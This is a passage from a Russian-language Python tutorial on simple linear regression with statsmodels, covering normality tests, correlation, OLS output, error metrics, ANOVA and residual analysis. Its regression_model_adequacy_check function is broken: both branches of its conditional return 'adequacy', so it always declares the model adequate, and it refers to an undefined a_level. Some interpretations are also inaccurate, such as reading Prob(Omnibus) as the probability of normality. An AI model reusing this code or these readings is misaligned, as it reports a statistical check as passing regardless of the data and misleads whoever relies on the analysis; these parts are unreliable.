Для проверки нормальности распределения использована пользовательская функция **norm\_distr\_check**, которая объединяет в себе набор стандартных статистических тестов проверки нормальности. Все тесты относятся к стандартному инструментарию **Pyton** (библиотека **scipy**, модуль **stats**), за исключением теста Эппса-Палли (Epps-Pulley test); о том, как реализовать этот тест средствами **Pyton** я писал в своей статье <https://habr.com/ru/post/685582/>.
Примечание: для использования функции **norm\_distr\_check** в каталог с **ipynb**-файлом необходимо поместить папку **table** c файлом **Tep\_table.csv**, который содержит табличные значения статистики критерия Эппса-Палли.
```
# пользовательская функция
norm_distr_check(X)
```

```
# Пользовательская функция
norm_distr_check (Y)
```
**Вывод:** большинство статистических тестов позволяют принять гипотезу о нормальности распределения переменных **X** и **Y**.
ПРОВЕРКА АНОМАЛЬНЫХ ЗНАЧЕНИЙ (ВЫБРОСОВ)
---------------------------------------
Статистическую проверку аномальных значений (выбросов) не стоит путать с проверкой выбросов, которая проводится на этапе первичной обработки результатов наблюдений. Последняя проводится с целью отсеять явные ошибочные данные (например, в результате неправильно поставленной запятой величина показателя может увеличиться/уменьшиться на порядок); здесь же мы говорим о статистической проверке данных, которые уже прошли этап первичной обработки.
Имеется довольно много критериев для проверки аномальных значений (подробнее см.[1]); вообще данная процедура довольно неоднозначная:
* критерии зависят от вида распределения;
* мало данных о сравнительной мощности этих критериев;
* даже в случае принятии гипотезы о нормальном распределении в выборке могут быть обнаружены аномальные значения и пр.
Кроме существует дилемма: если какие-то значения в выборке признаны выбросами - стоит или не стоит исследователю исключать их? Ведь каждое значение несет в себе информацию, причем иногда весьма ценную, а сильно отклоняющиеся от основного массива данные (которые не являются выбросами в смысле первичной обработки, но являются статистическим значимыми аномальными значениями) могут кардинально изменить статистический вывод.
В общем, о задаче выявления аномальных значений (выбросов) можно написать отдельно, а пока, в данном разборе, ограничимся проверкой аномальных значений по критерию **наибольшего максимального отклонения** (см.[1, с.547]) с помощью пользовательской функции **detecting\_outliers\_mad\_test**. Данные функция возвращает DataFrame, которые включает список аномальных значений со следующими признаками:
* **value** - проверяемое значение из выборки;
* **mad\_calc** и **mad\_table** - расчетное и табличное значение статистики критерия;
* **outlier\_conclusion** - вывод (выброс или нет).
Обращаю внимание, что критерий **наибольшего максимального отклонения** можно использовать только для нормально распределенных данных.
```
# пользовательская функция
print("Проверка наличия выбросов переменной X:\n")
result = detecting_outliers_mad_test(X)
mask = (result['outlier_conclusion'] == 'outlier')
display(result[mask])
```

```
# пользовательская функция
print("Проверка наличия выбросов переменной Y:\n")
result = detecting_outliers_mad_test(Y)
mask = (result['outlier_conclusion'] == 'outlier')
display(result[mask])
```
**Вывод:** в случае обеих переменных **X** и **Y** список пуст, следовательно, аномальных значений (выбросов) не выявлено.
КОРРЕЛЯЦИОННЫЙ АНАЛИЗ
---------------------
Корреляционный анализ - это разведка перед построением регрессионной модели.
Выполним расчет коэффициента линейной корреляции Пирсона, проверку его значимости и построение доверительных интервалов с помощью пользовательской функции **corr\_coef\_check** (про эту функцию более подробно написано в моей статье <https://habr.com/ru/post/683442/>):
```
# пользовательская функция
display(corr_coef_check(X, Y, scale='Evans'))
```
**Выводы:**
1. Значение коэффициента корреляции **coef\_value = 0.8900** свидетельствует о весьма сильной корреляционной связи (по шкале Эванса).
2. Коэффициент корреляции значим по критерию Стьюдента: **t\_calc ≥ t\_table**, **a\_calc ≤ a\_level**.
3. Доверительный интервал для коэффициента корреляции: **0.6621 ≤ coef\_value ≤ 0.9625**.
РЕГРЕССИОННЫЙ АНАЛИЗ
--------------------
### Предварительная визуализация
**python** позволяет выполнить предварительную визуализацию, например, с помощью функции **jointplot** библиотеки **seaborn**:
```
fig = plt.figure(figsize=(297/INCH, 210/INCH))
axes = sns.jointplot(
x=X, y=Y,
kind='reg',
ci=95)
plt.show()
```
### Построение модели
Выполним оценку параметров и анализ **простой линейной регрессии (simple linear regression)**, используя библиотеку **statsmodels** (<https://www.statsmodels.org/>) и входящий в нее модуль линейной регрессии **Linear Regression** (<https://www.statsmodels.org/stable/regression.html>).
Данный модуль включает в себя классы, реализующие различные методы оценки параметров моделей линейной регрессии, в том числе:
* класс **OLS** (<https://www.statsmodels.org/stable/generated/statsmodels.regression.linear_model.OLS.html#statsmodels.regression.linear_model.OLS>) - **Ordinary Least Squares** (обычный метод наименьших квадратов).
* класс **WLS** (<https://www.statsmodels.org/stable/generated/statsmodels.regression.linear_model.WLS.html#statsmodels.regression.linear_model.WLS>) - **Weighted Least Squares** (метод взвешенных наименьших квадратов) (<https://en.wikipedia.org/wiki/Weighted_least_squares>), применяется, если имеет место **гетероскедастичность данных** ([https://ru.wikipedia.org/wiki/Гетероскедастичность](https://ru.wikipedia.org/wiki/%D0%93%D0%B5%D1%82%D0%B5%D1%80%D0%BE%D1%81%D0%BA%D0%B5%D0%B4%D0%B0%D1%81%D1%82%D0%B8%D1%87%D0%BD%D0%BE%D1%81%D1%82%D1%8C)).
* класс **GLS** (<https://www.statsmodels.org/stable/generated/statsmodels.regression.linear_model.GLS.html#statsmodels.regression.linear_model.GLS>) - **Generalized Least Squares** (обобщенный метод наименьших квадратов) (<https://en.wikipedia.org/wiki/Generalized_least_squares>), применяется, если существует определенная степень корреляции между остатками в модели регрессии.
* класс **GLSAR** (<https://www.statsmodels.org/stable/generated/statsmodels.regression.linear_model.GLSAR.html#statsmodels.regression.linear_model.GLSAR>) - **Generalized Least Squares with AR covariance structure** (обобщенный метод наименьших квадратов, ковариационная структура с автокорреляцией - экспериментальный метод)
* класс **RecurciveLS** (<https://www.statsmodels.org/stable/examples/notebooks/generated/recursive_ls.html>) - **Recursive least squares** (рекурсивный метод наименьших квадратов) (<https://en.wikipedia.org/wiki/Recursive_least_squares_filter>)
* классы **RollingOLS** (<https://www.statsmodels.org/stable/generated/statsmodels.regression.rolling.RollingOLS.html#statsmodels.regression.rolling.RollingOLS>) и **RollingWLS** (<https://www.statsmodels.org/stable/generated/statsmodels.regression.rolling.RollingWLS.html#statsmodels.regression.rolling.RollingWLS>) - скользящая регрессия (<https://www.statsmodels.org/stable/examples/notebooks/generated/rolling_ls.html>, <https://help.fsight.ru/ru/mergedProjects/lib/01_regression_models/rolling_regression.htm>)
и т.д.
Так как исходные данные подчиняются нормальному закону распределения и аномальные значения (выбросы) отсутствуют, воспользуемся для оценки параметров обычным методом наименьших квадратов (класс **OLS**):
```
model_linear_ols = smf.ols(formula='Y ~ X', data=dataset_df)
result_linear_ols = model_linear_ols.fit()
print(result_linear_ols.summary())
```
Альтернативная форма выдачи результатов:
```
print(result_linear_ols.summary2())
```
Результаты построения модели мы получаем как класс **statsmodels.regression.linear\_model.RegressionResults** (<https://www.statsmodels.org/stable/generated/statsmodels.regression.linear_model.RegressionResults.html#statsmodels.regression.linear_model.RegressionResults>).
**Экспресс-выводы**, которые мы можем сразу сделать из результатов построения модели:
1. Коэффициенты регрессии модели Y = b0 + b1∙X:
* **Intercept = b0 = -21.3741**
* **b1 = 0.0129**
2. Коэффициент детерминации **R-squared = 0.776**, его скорректированная оценка **Adj. R-squared = 0.757** - это означает, что регрессионная модуль объясняет 75.75% вариации переменной Y.
3. Проверка значимости коэффициента детерминации:
* расчетное значение статистики критерия Фишера: **F-statistic = 41.61**
* расчетный уровень значимости **Prob (F-statistic) = 3.16e-05**
* так как значение **Prob (F-statistic) < 0.05**, то нулевая гипотеза **R-squared = 0** НЕ ПРИНИМАЕТСЯ, т.е. коэффициент детерминации ЗНАЧИМ
4. Проверка значимости коэффициентов регрессии:
* расчетный уровень значимости **P>|t|** не превышает **0.05** - это означает, что оба коэффициента регрессии значимы
* об этом же свидетельствует то, что доверительный интервал для обоих коэффициентов регрессии (**[0.025; 0.975]**) не включает в себя точку **0**Также в таблице результатов содержится прочая информация по коэффициентам регрессии: стандартная ошибка **Std.Err.** расчетное значение статистики критерия Стьюдента **t** для проверки гипотезы о значимости.
5. Анализ остатков модели:
* Тест **Omnibus** - про этот тест подробно написано в <https://en.wikipedia.org/wiki/Omnibus_test>, <https://medium.com/swlh/interpreting-linear-regression-through-statsmodels-summary-4796d359035a>, <http://work.thaslwanter.at/Stats/html/statsModels.html>.
Расчетное значение статистики критерия **Omnibus = 3.466** - по сути расчетное значение F-критерия (см. <https://en.wikipedia.org/wiki/Omnibus_test>).
**Prob(Omnibus) = 0.177** — показывает вероятность нормального распределения остатков (значение **1** указывает на совершенно нормальное распределение).
Учитывая, что в дальнейшем мы проверим нормальность распределения остатков по совокупности различных тестов, в том числе с достаточно высокой мощностью, и все тесты позволят принять гипотезу о нормальном распределении - в данном случае к тесту **Omnibus** возникают вопросы. С этим тестом нужно разбираться отдельно.
* **Skew = 0.014** и **Kurtosis = 1.587** - показатели асимметрии и эксцесса остатков свидетельствуют, что распределение остатков практически симметричное, островершинное.
* проверка нормальности распределения остатков по критерию Харке-Бера: расчетное значение статистики критерия **Jarque-Bera (JB) = 1.164** и расчетный уровень значимости **Prob(JB) = 0.559**. К данным результатам также возникают вопросы, особенно, если учесть, что критерий Харке-Бера является асимптотическим, расчетное значение имеет распределение хи-квадрат, поэтому данный критерий рекомендуют применять только для больших выборок (см. [https://en.wikipedia.org/wiki/Jarque–Bera\_test](https://en.wikipedia.org/wiki/Jarque%E2%80%93Bera_test)). Проверку нормальности распределения остатков модели лучше проводить с использованием набора стандартных статистических тестов **python** (см. далее).
6. Проверка автокорреляции по критерию Дарбина-Уотсона: **Durbin-Watson = 1.443**.
Мы не будем здесь разбирать данный критерий, так как явление автокорреляции больше характерно для данных, выражаемых в виде временных рядов. Однако, для грубой оценки считается, что при расчетном значении статистики криетрия Дарбина=Уотсона а интервале **[1; 2]** автокорреляция отсутствует (см.[https://en.wikipedia.org/wiki/Durbin–Watson\_statistic](https://en.wikipedia.org/wiki/Durbin%E2%80%93Watson_statistic)).
Более подробно про критерий Дарбина-Уотсона - см. [1, с.659].
**Прочая информация**, которую можно извлечь из результатов построения модели:
1. **Covariance Type** - тип ковариации, подробнее см. <https://habr.com/ru/post/681218/>, [https://towardsdatascience.com/simple-explanation-of-statsmodel-linear-regression-model-summary-35961919868b#:~:text=Covariance type is typically nonrobust,with respect to each other](https://towardsdatascience.com/simple-explanation-of-statsmodel-linear-regression-model-summary-35961919868b#:~:text=Covariance%20type%20is%20typically%20nonrobust,with%20respect%20to%20each%20other).
2. **Scale** - масштабный коэффициент для ковариационной матрицы (<https://www.statsmodels.org/stable/generated/statsmodels.regression.linear_model.RegressionResults.scale.html#statsmodels.regression.linear_model.RegressionResults.scale>), равен величине **Mean squared error (MSE)** (cреднеквадратической ошибке), об подробнее см. далее, в разделе про ошибки аппроксимации моделей.
3. Показатели сравнения качества различных моделей:
* **Log-Likelihood** - логарифмическая функция правдоподобия, подробнее см. <https://en.wikipedia.org/wiki/Likelihood_function#Log-likelihood>, <https://habr.com/ru/post/433804/>
* **AIC** - информационный критерий Акаике (**Akaike information criterion**), подробнее см. <https://en.wikipedia.org/wiki/Akaike_information_criterion>
* **BIC** - информационный критерий Байеса (**Bayesian information criterion**), подробнее см. <https://en.wikipedia.org/wiki/Bayesian_information_criterion>В данной статье мы эти показатели рассматривать не будем, так как задача выбора одной модели из нескольких перед нами не стоит.
4. Число обусловленности **Cond. No = 96792** используется для проверки мультиколлинеарности (считается, что мультиколлинеарность есть, если значение **Cond. No > 30**) (см. <http://work.thaslwanter.at/Stats/html/statsModels.html>). В нашем случае парной регрессионной модели о мультиколлинеарности речь не идет.
Далее будем извлекать данные из стандартного набора выдачи результатов и анализировать их более подробно. Последующие этапы вовсе не обязательно проводить в полном объеме при решении задач, но здесь мы рассмотрим их подробно.
### Параметры и уравнение регрессионной модели
Извлечем параметры полученной модели - как свойство **params** модели:
```
print('Параметры модели: \n', result_linear_ols.params, type(result_linear_ols.params))
```
Имея параметры модели, можем формализовать уравнение модели **Y = b0 + b1\*X**:
```
b0 = result_linear_ols.params['Intercept']
b1 = result_linear_ols.params['X']
Y_calc = lambda x: b0 + b1*x
```
### График регрессионной модели
Для построения графиков регрессионных моделей можно воспользоваться стандартными возможностями библиотек **statsmodels**, **seaborn**, либо создать пользовательскую функцию - на усмотрение исследователя:
**1. Построение графиков регрессионных моделей с использованием библиотеки statsmodels**
С помощью функции **statsmodels.graphics.plot\_fit** (<https://www.statsmodels.org/stable/generated/statsmodels.graphics.regressionplots.plot_fit.html#statsmodels.graphics.regressionplots.plot_fit>) - отображается график **Y and Fitted vs.X** (фактические и расчетные значения Y с доверительным интервалом для каждого значения Y):
```
fig, ax = plt.subplots(figsize=(297/INCH, 210/INCH))
fig = sm.graphics.plot_fit(
result_linear_ols, 'X',
vlines=True, # это параметр отвечает за отображение доверительных интервалов для Y
ax=ax)
ax.set_ylabel(Variable_Name_Y)
ax.set_xlabel(Variable_Name_X)
ax.set_title(Task_Project)
plt.show()
```
С помощью функции **statsmodels.graphics.plot\_regress\_exog** (<https://www.statsmodels.org/stable/generated/statsmodels.graphics.regressionplots.plot_regress_exog.html#statsmodels.graphics.regressionplots.plot_regress_exog>) - отображается область 2х2, которая содержит:
* предыдущий график **Y and Fitted vs.X**;
* график остатков **Residuals versus X**;
* график **Partial regression plot** - график частичной регрессии, пытается показать эффект добавления другой переменной в модель, которая уже имеет одну или несколько независимых переменных (более подробно см. <https://en.wikipedia.org/wiki/Partial_regression_plot>);
* график **CCPR Plot (Component-Component plus Residual Plot)** - еще один способ оценить влияние одной независимой переменной на переменную отклика, принимая во внимание влияние других независимых переменных (более подробно - см. <https://towardsdatascience.com/calculating-price-elasticity-of-demand-statistical-modeling-with-python-6adb2fa7824d>, <https://www.kirenz.com/post/2021-11-14-linear-regression-diagnostics-in-python/linear-regression-diagnostics-in-python/>).
```
fig = plt.figure(figsize=(297/INCH, 210/INCH))
sm.graphics.plot_regress_exog(result_linear_ols, 'X', fig=fig)
plt.show()
```
**2. Построение графиков регрессионных моделей с использованием библиотеки seaborn**
Воспользуемся модулем **regplot** библиотеки **seaborn** (<https://seaborn.pydata.org/generated/seaborn.regplot.html>). Данный модуль позволяет визуализировать различные виды регрессии:
* линейную
* полиномиальную
* логистическую
* взвешенную локальную регрессию (LOWESS - Locally Weighted Scatterplot Smoothing) (см. [http://www.machinelearning.ru/wiki/index.php?title=Алгоритм\_LOWESS](http://www.machinelearning.ru/wiki/index.php?title=%D0%90%D0%BB%D0%B3%D0%BE%D1%80%D0%B8%D1%82%D0%BC_LOWESS), <https://www.statsmodels.org/stable/generated/statsmodels.nonparametric.smoothers_lowess.lowess.html>)
Более подробно про модуль **regplot** можно прочитать в статье: <https://pyprog.pro/sns/sns_8_regression_models.html>.
Есть более совершенный модуль **lmplot** (<https://seaborn.pydata.org/generated/seaborn.lmplot.html>), который объединяет в себе **regplot** и **FacetGrid**, но мы его здесь рассматривать не будем.
```
# создание рисунка (Figure) и области рисования (Axes)
fig = plt.figure(figsize=(297/INCH, 420/INCH/1.5))
ax1 = plt.subplot(2,1,1)
ax2 = plt.subplot(2,1,2)
# заголовок рисунка (Figure)
title_figure = Task_Project
fig.suptitle(title_figure, fontsize = 18)
# заголовок области рисования (Axes)
title_axes_1 = 'Линейная регрессионная модель'
ax1.set_title(title_axes_1, fontsize = 16)
# график регрессионной модели
order_mod = 1 # порядок модели
#label_legend_regr_model = 'фактические данные'
sns.regplot(
#data=dataset_df,
x=X, y=Y,
#x_estimator=np.mean,
order=order_mod,
logistic=False,
lowess=False,
robust=False,
logx=False,
ci=95,
scatter_kws={'s': 30, 'color': 'red'},
line_kws={'color': 'blue'},
#label=label_legend_regr_model,
ax=ax1)
ax1.set_ylabel(Variable_Name_Y)
ax1.legend()
# график остатков
title_axes_2 = 'График остатков'
ax2.set_title(title_axes_2, fontsize = 16)
sns.residplot(
#data=dataset_df,
x=X, y=Y,
order=order_mod,
lowess=False,
robust=False,
scatter_kws={'s': 30, 'color': 'darkorange'},
ax=ax2)
ax2.set_xlabel(Variable_Name_X)
plt.show()
```
**3. Построение графиков регрессионных моделей с помощью пользовательской функции**
```
# Пользовательская функция
graph_regression_plot_sns(
X, Y,
regression_model=Y_calc,
Xmin=Xmin_graph, Xmax=Xmax_graph,
Ymin=Ymin_graph, Ymax=Ymax_graph,
title_figure=Task_Project,
x_label=Variable_Name_X,
y_label=Variable_Name_Y,
label_legend_regr_model=f'линейная регрессия Y = {b0:.3f} + {b1:.4f}*X',
s=80,
file_name='graph/regression_plot_lin.png')
```
### Статистический анализ регрессионной модели
**1. Расчет ошибки аппроксимации (Error Metrics)**
Ошибки аппроксимации (Error Metrics) позволяют получить общее представление о качестве модели, а также позволяют сравнивать между собой различные модели.
Создадим пользовательскую функцию, которая рассчитывает основные ошибки аппроксимации для заданной модели:
* **Mean squared error (MSE)** или **Mean squared deviation (MSD)** - среднеквадратическая ошибка (<https://en.wikipedia.org/wiki/Mean_squared_error>):
* **Root mean square error (RMSE)** или **Root mean square deviation (RMSD)** - квадратный корень из **MSE** (<https://en.wikipedia.org/wiki/Root-mean-square_deviation>):
* **Mean absolute error (MAE)** - средняя абсолютная ошибка (<https://en.wikipedia.org/wiki/Mean_absolute_error>):
* **Mean squared prediction error (MSPE)** - среднеквадратическая ошибка прогноза (среднеквадратическая ошибка в процентах) (https://en.wikipedia.org/wiki/Mean\_squared\_prediction\_error):
* **Mean absolute percentage error (MAPE)** - средняя абсолютная ошибка в процентах (<https://en.wikipedia.org/wiki/Mean_absolute_percentage_error>):
Про выбор метрики см. также <https://machinelearningmastery.ru/how-to-select-the-right-evaluation-metric-for-machine-learning-models-part-2-regression-metrics-d4a1a9ba3d74/>.
```
# Пользовательская функция
def regression_error_metrics(model, model_name=''):
model_fit = model.fit()
Ycalc = model_fit.predict()
n_fit = model_fit.nobs
Y = model.endog
MSE = (1/n_fit) * np.sum((Y-Ycalc)**2)
RMSE = sqrt(MSE)
MAE = (1/n_fit) * np.sum(abs(Y-Ycalc))
MSPE = (1/n_fit) * np.sum(((Y-Ycalc)/Y)**2)
MAPE = (1/n_fit) * np.sum(abs((Y-Ycalc)/Y))
model_error_metrics = {
'MSE': MSE,
'RMSE': RMSE,
'MAE': MAE,
'MSPE': MSPE,
'MAPE': MAPE}
result = pd.DataFrame({
'MSE': MSE,
'RMSE': RMSE,
'MAE': MAE,
'MSPE': "{:.3%}".format(MSPE),
'MAPE': "{:.3%}".format(MAPE)},
index=[model_name])
return model_error_metrics, result
(model_error_metrics, result) = regression_error_metrics(model_linear_ols, model_name='linear_ols')
display(result)
```
В литературе по прикладной статистике нет единого мнения о допустимом размере относительных ошибок аппроксимации: в одних источниках допустимой считается ошибка 5-7%, в других она может быть увеличена до 8-10%, и даже до 15%.
**Вывод:** модель хорошо аппроксимирует фактические данные (относительная ошибка аппроксимации **MAPE = 3.405% < 10%**).
**2. Дисперсионный анализ регрессионной модели (ДАРМ)**
ДАРМ не входит в стандартную форму выдачи результатов **Regression Results**, однако я решил написать здесь о нем по двум причинам:
1. Именно анализ дисперсии регрессионной модели, разложение этой дисперсии на составляющие дает фундаментальное представление о сути регрессии, а термины, используемые при ДАРМ, применяются на последующих этапах анализа.
2. С терминами ДАРМ в литературе по прикладной статистике имеется некоторая путаница, в разных источниках они могут именоваться по-разному (см., например, [8, с.52]), поэтому, чтобы двигаться дальше, необходимо определиться с понятиями.
При ДАРМ общую вариацию результативного признака (**Y**) принято разделять на две составляющие - вариация, обусловленная регрессией и вариация, обусловленная отклонениями от регрессии (остаток), при этом в разных источниках эти термины могут именоваться и обозначаться по-разному, например:
1. **Вариация, обусловленная регрессией** - может называться **Explained sum of squares (ESS)**, **Sum of Squared Regression (SSR)** (<https://en.wikipedia.org/wiki/Explained_sum_of_squares>, <https://towardsdatascience.com/anova-for-regression-fdb49cf5d684>), **Sum of squared deviations (SSD)**.
2. **Вариация, обусловленная отклонениями от регрессии (остаток)** - может называться **Residual sum of squares (RSS)**, **Sum of squared residuals (SSR)**, **Squared estimate of errors, Sum of Squared Error (SSE)** (<https://en.wikipedia.org/wiki/Residual_sum_of_squares>, <https://towardsdatascience.com/anova-for-regression-fdb49cf5d684>); в отчественной практике также применяется термин **остаточная дисперсия**.
3. **Общая (полная) вариация** - может называться **Total sum of squares (TSS)**, **Sum of Squared Total (SST)** (<https://en.wikipedia.org/wiki/Partition_of_sums_of_squares>, <https://towardsdatascience.com/anova-for-regression-fdb49cf5d684>).
Как видим, путаница знатная:
* в разных источниках под **SSR** могут подразумеваться различные показатели;
* легко перепутать показатели **ESS** и **SSE**;
* в библиотеке **statsmodel** также есть смешение терминов: для показателя **Explained sum of squares** используется свойство **ess**, а для показателя **Sum of squared (whitened) residuals** - свойство **ssr**.
Мы будем пользоваться системой обозначений, принятой в большинстве источников - **SSR (Sum of Squared Regression)**, **SSE (Sum of Squared Error)**, **SST (Sum of Squared Total)**. Стандартная таблица ДАРМ в этом случае имеет вид:
Примечания:
1. Здесь приведена таблица ДАРМ для множественной линейной регрессионной модели (МЛРМ), в нашем случае при ПЛРМ мы имеем частный случай **p=1**.
2. Показатели **Fcalc-ad** и **Fcalc-det** - расчетные значения статистики критерия Фишера при проверке адекватности модели и значимости коэффициента детерминации (об этом - см.далее).
Более подробно про дисперсионный анализ регрессионной модели - см.[4, глава 3].
Класс **statsmodels.regression.linear\_model.RegressionResults** позволяет нам получить данные для ANOVA (см. <https://www.statsmodels.org/stable/generated/statsmodels.regression.linear_model.RegressionResults.html#statsmodels.regression.linear_model.RegressionResults>) как свойства класса:
1. **Сумма квадратов, обусловленная регрессией / SSR (Sum of Squared Regression)** - свойство **ess**.
2. **Сумма квадратов, обусловленная отклонением от регрессии / SSE (Sum of Squared Error)** - свойство **ssr**.
3. **Общая (полная) сумма квадратов / SST (Sum of Squared Total)** - свойство **centered\_tss**.
4. **Кол-во наблюдений / Number of observations** - свойство **nobs**.
5. **Число степеней свободы модели** / **Model degrees of freedom** - равно числу переменных модели (за исключением константы, если она присутствует - свойство **df\_model**.
6. **Среднеквадратичная ошибка модели / Mean squared error the model** - сумма квадратов, объясненная регрессией, деленная на число степеней свободы регрессии - свойство **mse\_model**.
7. **Среднеквадратичная ошибка остатков / Mean squared error of the residuals** - сумма квадратов остатков, деленная на остаточные степени свободы - свойство **mse\_resid**.
8. **Общая среднеквадратичная ошибка / Total mean squared error** - общая сумма квадратов, деленная на количество наблюдений - свойство **mse\_total**.
Также имеется модуль **statsmodels.stats.anova.anova\_lm**, который позволяет получить результаты ДАРМ (нескольких типов - 1, 2, 3):
```
# тип 1
print('The type of Anova test: 1')
display(sm.stats.anova_lm(result_linear_ols, typ=1))
# тип 2
print('The type of Anova test: 2')
display(sm.stats.anova_lm(result_linear_ols, typ=2))
# тип 3
print('The type of Anova test: 3')
display(sm.stats.anova_lm(result_linear_ols, typ=3))
```
На мой взгляд, форма таблица результатов **statsmodels.stats.anova.anova\_lm** не вполне удобна, поэтому сформируем ее самостоятельно, для чего создадим пользовательскую функцию **ANOVA\_table\_regression\_model**:
```
# Пользовательская функция
def ANOVA_table_regression_model(model_fit):
n = int(model_fit.nobs)
p = int(model_fit.df_model)
SSR = model_fit.ess
SSE = model_fit.ssr
SST = model_fit.centered_tss
result = pd.DataFrame({
'sources_of_variation': ('regression (SSR)', 'deviation from regression (SSE)', 'total (SST)'),
'sum_of_squares': (SSR, SSE, SST),
'degrees_of_freedom': (p, n-p-1, n-1)})
result['squared_error'] = result['sum_of_squares'] / result['degrees_of_freedom']
R2 = 1 - result.loc[1, 'sum_of_squares'] / result.loc[2, 'sum_of_squares']
F_calc_adequacy = result.loc[2, 'squared_error'] / result.loc[1, 'squared_error']
F_calc_determ_check = result.loc[0, 'squared_error'] / result.loc[1, 'squared_error']
result['F-ratio'] = (F_calc_determ_check, F_calc_adequacy, '')
return result
result = ANOVA_table_regression_model(result_linear_ols)
display(result)
print(f"R2 = 1 - SSE/SST = {1 - result.loc[1, 'sum_of_squares'] / result.loc[2, 'sum_of_squares']}")
print(f"F_calc_adequacy = MST / MSE = {result.loc[2, 'squared_error'] / result.loc[1, 'squared_error']}")
print(f"F_calc_determ_check = MSR / MSE = {result.loc[0, 'squared_error'] / result.loc[1, 'squared_error']}")
```
ДАРМ позволяет визуализировать вариацию:
```
fig, axes = plt.subplots(figsize=(210/INCH, 297/INCH/1.5))
axes.pie(
(result.loc[0, 'sum_of_squares'], result.loc[1, 'sum_of_squares']),
labels=(result.loc[0, 'sources_of_variation'], result.loc[1, 'sources_of_variation']),
autopct='%.1f%%',
startangle=60)
plt.show()
```
На основании данных ДАРМ мы рассчитали ряд показателей (**R2**, **Fcalc-ad** и **Fcalc-det**), которые будут использоваться в дальнейшем.
**3. Анализ остатков (проверка нормальности распределения остатков и гипотезы о равенстве нулю среднего значения остатков)**
Проверка нормальности распределения остатков - один их важнейших этапов анализа регрессионной модели. Требование нормальности распределения остатков не требуется для отыскания параметров модели, но необходимо в дальнейшем для проверки статистических гипотез с использованием критериев Фишера и Стьюдента (проверка адекватности модели, значимости коэффициента детерминации, значимости коэффициентов регрессии) и построения доверительных интервалов [5, с.122].
Остатки регрессионной модели:
```
print('Остатки регрессионной модели:\n', result_linear_ols.resid, type(result_linear_ols.resid))
res_Y = np.array(result_linear_ols.resid)
```
**statsmodels** может выдавать различные преобразованные виды остатков (см. <https://www.statsmodels.org/stable/generated/statsmodels.regression.linear_model.RegressionResults.resid_pearson.html>, <https://www.statsmodels.org/stable/generated/statsmodels.regression.linear_model.RegressionResults.wresid.html>).
График остатков:
```
# Пользовательская функция
graph_scatterplot_sns(
X, res_Y,
Xmin=Xmin_graph, Xmax=Xmax_graph,
Ymin=-3.0, Ymax=3.0,
color='red',
#title_figure=Task_Project,
title_axes='Остатки линейной регрессионной модели', title_axes_fontsize=18,
x_label=Variable_Name_X,
y_label='ΔY = Y - Ycalc',
s=75,
file_name='graph/residuals_plot_sns.png')
```
Проверка нормальности распределения остатков:
```
# Пользовательская функция
graph_hist_boxplot_probplot_sns(
data=res_Y,
data_min=-2.5, data_max=2.5,
graph_inclusion='bp',
data_label='ΔY = Y - Ycalc',
#title_figure=Task_Project,
title_axes='Остатки линейной регрессионной модели', title_axes_fontsize=16,
file_name='graph/residuals_hist_boxplot_probplot_sns.png')
```

```
norm_distr_check(res_Y)
```
**Вывод:** большинство статистических тестов позволяют принять гипотезу о нормальности распределения остатков.
Проверка гипотезы о равенстве нулю среднего значения остатков - так как остатки имеют нормальное распределение, воспользуемся критерием Стьюдента (функция **scipy.stats.ttest\_1samp**, <https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.ttest_ind.html>):
```
sps.ttest_1samp(res_Y, popmean=0)
```
**Вывод:** так как расчетный уровень значимости превышает заданный (0.05), то нулевая гипотеза о равенстве нулю остатков ПРИНИМАЕТСЯ.
**4. Проверка адекватности модели**
Суть проверки адекватности регрессионной модели заключается в сравнении полной дисперсии **MST** и остаточной дисперсии **MSE** - проверяется гипотеза о равенстве этих дисперсий по критерию Фишера. Если дисперсии различаются значимо, то модель считается адекватной. Более подробно про проверку адекватности регрессионной - см.[1, с.658], [2, с.49], [4, с.154].
Для проверки адекватности регрессионной модели создадим пользовательскую функцию **regression\_model\_adequacy\_check**:
```
def regression_model_adequacy_check(
model_fit,
p_level: float=0.95,
model_name=''):
n = int(model_fit.nobs)
p = int(model_fit.df_model) # Число степеней свободы регрессии, равно числу переменных модели (за исключением константы, если она присутствует)
SST = model_fit.centered_tss # SST (Sum of Squared Total)
dfT = n-1
MST = SST / dfT
SSE = model_fit.ssr # SSE (Sum of Squared Error)
dfE = n - p - 1
MSE = SSE / dfE
F_calc = MST / MSE
F_table = sci.stats.f.ppf(p_level, dfT, dfE, loc=0, scale=1)
a_calc = 1 - sci.stats.f.cdf(F_calc, dfT, dfE, loc=0, scale=1)
conclusion_model_adequacy_check = 'adequacy' if F_calc >= F_table else 'adequacy'
# формируем результат
result = pd.DataFrame({
'SST': (SST),
'SSE': (SSE),
'dfT': (dfT),
'dfE': (dfE),
'MST': (MST),
'MSE': (MSE),
'p_level': (p_level),
'a_level': (a_level),
'F_calc': (F_calc),
'F_table': (F_table),
'F_calc >= F_table': (F_calc >= F_table),
'a_calc': (a_calc),
'a_calc <= a_level': (a_calc <= a_level),
'adequacy_check': (conclusion_model_adequacy_check),
},
index=[model_name]
)
return result
regression_model_adequacy_check(result_linear_ols, p_level=0.95, model_name='linear_ols')
```
**Вывод:** модель является АДЕКВАТНОЙ.
**5. Коэффициент детерминации и проверка его значимости**
Различают несколько видов коэффициента детерминации:
1. Собственно обычный **коэффициент детерминации**:

Его значение может быть получено как свойство **rsquared** модели.
2. **Скорректированный (adjusted) коэффициент детерминации** - используется для того, чтобы была возможность сравнивать модели с разным числом признаков так, чтобы число регрессоров (признаков) не влияло на статистику R2, при его расчете используются несмещённые оценки дисперсий:

Его значение может быть получено как свойство **rsquared\_adj** модели.
3. **Обобщённый (extended) коэффициент детерминации** - используется для сравнения моделей регрессии со свободным членом и без него, а также для сравнения между собой регрессий, построенных с помощью различных методов: МНК, обобщённого метода наименьших квадратов (ОМНК), условного метода наименьших квадратов (УМНК), обобщённо-условного метода наименьших квадратов (ОУМНК). В данном разборе ПЛРМ рассматривать этот коэффициент мы не будем.
Более подробно с теорией вопроса можно ознакомиться, например: [http://www.machinelearning.ru/wiki/index.php?title=Коэффициент\_детерминации](http://www.machinelearning.ru/wiki/index.php?title=%D0%9A%D0%BE%D1%8D%D1%84%D1%84%D0%B8%D1%86%D0%B8%D0%B5%D0%BD%D1%82_%D0%B4%D0%B5%D1%82%D0%B5%D1%80%D0%BC%D0%B8%D0%BD%D0%B0%D1%86%D0%B8%D0%B8)), а также в [7].
Значения коэффициента детерминации и скорректированного коэффициента детерминации, извлеченные с помощью свойств **rsquared** и **rsquared\_adj** модели.
```
print('R2 =', result_linear_ols.rsquared)
